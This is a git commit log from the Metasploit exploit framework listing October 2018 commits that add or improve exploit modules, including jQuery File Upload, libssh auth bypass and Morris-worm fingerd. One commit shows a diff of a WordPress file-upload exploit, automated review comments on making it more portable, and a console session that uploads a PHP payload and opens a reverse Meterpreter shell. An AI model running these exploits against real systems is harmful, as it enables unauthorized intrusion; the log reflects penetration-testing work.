Brendan Coles
0b37e29c9a
Update modules/exploits/windows/imap/mercury_login.rb
...
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
2018-10-23 14:32:38 +02:00
Brendan Coles
43dd23042b
Update modules/exploits/windows/imap/mercury_login.rb
...
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
2018-10-23 14:32:10 +02:00
William Vu
bdf2d44415
Augment check with Apache Server header
2018-10-23 07:04:14 -05:00
William Vu
0249f1a4af
Improve check method and refactor
2018-10-23 06:20:31 -05:00
Ivan Racic
ee3c663baf
Upgraded exploit to work on any Windows target
...
In short, added egghunter and return address of
the executable file itself, so it should work
on any Windows system.
Also, upgraded to modern exploit module requirements.
2018-10-23 12:11:56 +02:00
William Vu
3d06c10ad0
Link to Apache AllowOverride directive and change
2018-10-23 03:51:16 -05:00
William Vu
c9673df3b8
Add WordPress Work The Flow File Upload links
...
As noted by @bcoles, we have a module exploiting this vuln in #5130,
though it was described as the WordPress plugin and not the asset it had
included. The vuln was "patched" in the plugin by deleting the code.
Somehow this flew under everyone's noses.
msf5 exploit(unix/webapp/wp_worktheflow_upload) > edit
msf5 exploit(unix/webapp/wp_worktheflow_upload) > git diff
[*] exec: git diff
diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
index 727c1936f5..2146be49ec 100644
--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -50,8 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
post_data = data.to_s
res = send_request_cgi({
- 'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
- 'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'),
+ 'uri' => '/jQuery-File-Upload/server/php/index.php',
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
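Review bot: the new 'uri' value in this hunk hardcodes '/jQuery-File-Upload/server/php/index.php' and drops the normalize_uri(...) call that previously built the path from wordpress_url_plugins, so the request cannot be pointed at an installation that lives under a different prefix. Suggest keeping normalize_uri and taking the prefix from a TARGETURI option (target_uri.path), e.g. `'uri' => normalize_uri(target_uri.path, 'server', 'php', 'index.php'),`, so the same module works for both the WordPress plugin layout and a standalone checkout.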
@@ -70,8 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Calling payload...")
send_request_cgi(
- 'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
- 'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
+ 'uri' => "/jQuery-File-Upload/server/php/files/#{php_pagename}"
)
end
end
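Review bot: this hunk repeats the same literal base path as the upload request, now with php_pagename interpolated into a string; if the path changes, the two requests will drift apart. Suggest a single helper that returns the server/php base path for both the upload and this payload request, and `normalize_uri(target_uri.path, 'server', 'php', 'files', php_pagename)` instead of string interpolation so the path is joined the same way in both places.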
msf5 exploit(unix/webapp/wp_worktheflow_upload) > rerun
[*] Reloading module...
[*] Started reverse TCP handler on 172.28.128.1:4444
[+] Our payload is at: rLRFvlAiE.php. Calling payload...
[*] Calling payload...
[*] Sending stage (37775 bytes) to 172.28.128.3
[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54386) at 2018-10-23 03:17:59 -0500
[+] Deleted rLRFvlAiE.php
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : ubuntu-xenial
OS : Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >
Welp.
2018-10-23 03:51:11 -05:00
William Vu
a55f7ff30a
Clarify vuln (re)discovery vs. disclosure
...
https://www.bleepingcomputer.com/news/security/jquery-file-upload-plugin-vulnerable-for-8-years-and-only-hackers-knew/
2018-10-23 03:22:45 -05:00
William Vu
b4bdc52597
Sort path list by frequency
2018-10-22 23:35:42 -05:00
William Vu
dbc0c802d5
Add detection of additional paths
2018-10-22 23:35:42 -05:00
William Vu
c4f8b6c937
Add rudimentary check method
2018-10-22 23:35:42 -05:00
William Vu
dba7e35819
Refactor slightly with methods
...
And also check upload response.
2018-10-22 23:35:42 -05:00
William Vu
e7ada1a40c
Add timeout on payload request
...
This ensures we don't block on execution.
2018-10-22 23:35:42 -05:00
William Vu
15f14bb295
Add note about Apache .htaccess
2018-10-22 23:35:42 -05:00
William Vu
a986a17bb0
Link to @lcashdol's PoC
2018-10-22 23:35:42 -05:00
William Vu
37dbdbf58f
Update project URL to PR
2018-10-22 23:35:42 -05:00
William Vu
41721c31fb
Add blueimp's jQuery (Arbitrary) File Upload
2018-10-22 23:35:42 -05:00
Green-m
c0e8d09802
Add disclosure date.
2018-10-23 09:44:36 +08:00
Spencer McIntyre
15e67de8fc
Add the EMBED option for play_youtube.rb
2018-10-22 19:51:41 -04:00
William Vu
3ca309423a
Add check method to detect 4.3BSD fingerd
2018-10-22 18:32:37 -05:00
William Vu
8459aad215
Prefer aobleq over incl/cmpl/bleq in payload
2018-10-22 18:32:37 -05:00
William Vu
01d11e71db
Add Space, BadChars, Encoder, and DisableNops
2018-10-22 18:32:37 -05:00
William Vu
fa892d8eba
Add Morris worm fingerd stack buffer overflow
2018-10-22 18:32:37 -05:00
William Vu
8f2df4864c
Add 4.3BSD VAX reverse command shell payload
2018-10-22 18:32:37 -05:00
Jeffrey Martin
380aaf7889
bump payloads gem
2018-10-22 18:20:45 -05:00
William Vu
e6bbc6dbd6
Land #10845, glassfish_traversal typo fix
2018-10-22 15:32:14 -05:00
pasta
8d9bd33222
new version using Metasm
2018-10-22 16:36:04 -03:00
blue-bird1
6125ef06ad
fix small typo
2018-10-23 00:01:13 +08:00
Green-m
4711d6ba08
Move post module persistence service to exploit.
2018-10-22 18:07:40 +08:00
Luisco100
74683ce951
Add Windows Post Module to disable Windows Defender signatures
2018-10-21 12:07:54 -05:00
William Vu
58a6c4137d
Add a better timeout than expect can provide
2018-10-20 13:56:37 -05:00
William Vu
a965abaf36
Add full payload support by setting $PATH
2018-10-20 13:56:33 -05:00
William Vu
60c4b87ad1
Prefer expect over sleeping between writes
2018-10-20 13:15:15 -05:00
William Vu
ad6f15c8ca
Add Morris worm sendmail debug mode exploit
2018-10-20 13:15:01 -05:00
Brendan Coles
7a36056713
Move exploit/qnx/qconn_exec to exploit/qnx/qconn/qconn_exec
2018-10-20 18:16:59 +00:00
William Vu
aae74472d2
Land #10817, QNX qconn module rename
2018-10-20 03:10:22 -05:00
Brent Cook
accf9edf89
Land #10835, libssh fingerprint improvements
2018-10-19 19:48:23 -05:00
bwatters-r7
47353553e5
Get everything together finally (still needs cleanup)
2018-10-19 18:15:44 -05:00
bwatters-r7
a6be9e573f
Should have saved the actual file...
2018-10-19 16:30:21 -05:00
bwatters-r7
eeec3c115e
This is as far as I can take it for an exploit module
...
but it still does not work. Committing for posterity.
2018-10-19 16:12:47 -05:00
William Vu
abd425c863
Land #10819, os_name population for ssh_login*
2018-10-19 15:53:38 -05:00
William Vu
db7bd3d50c
Update style
2018-10-19 15:52:26 -05:00
William Vu
2a1dec45ed
Land #10832, TARGETURI for tomcat_utf8_traversal
2018-10-19 15:47:37 -05:00
William Vu
e4c71265fb
Improve banner checking in libssh_auth_bypass
...
Now we do the right thing when libssh is patched.
2018-10-19 15:21:12 -05:00
pasta
3a02e9e80f
First release, messagebox payload for x64
2018-10-19 16:39:41 -03:00
Spencer McIntyre
65d26d3a1e
Use the DISPLAY environment variable when available
2018-10-19 14:35:35 -04:00
William Vu
21397330f8
Refactor fortinet_backdoor copypasta
2018-10-19 00:07:18 -05:00
William Vu
863ab3447f
Add libssh auth bypass module
2018-10-18 23:03:23 -05:00
Wei Chen
3cee96d8ed
Land #10664, add Windows SetImeInfoEx Win32k NULL Pointer Dereference
2018-10-18 14:42:14 -05:00
Wei Chen
fac05db154
Update rescue statement
2018-10-18 14:30:20 -05:00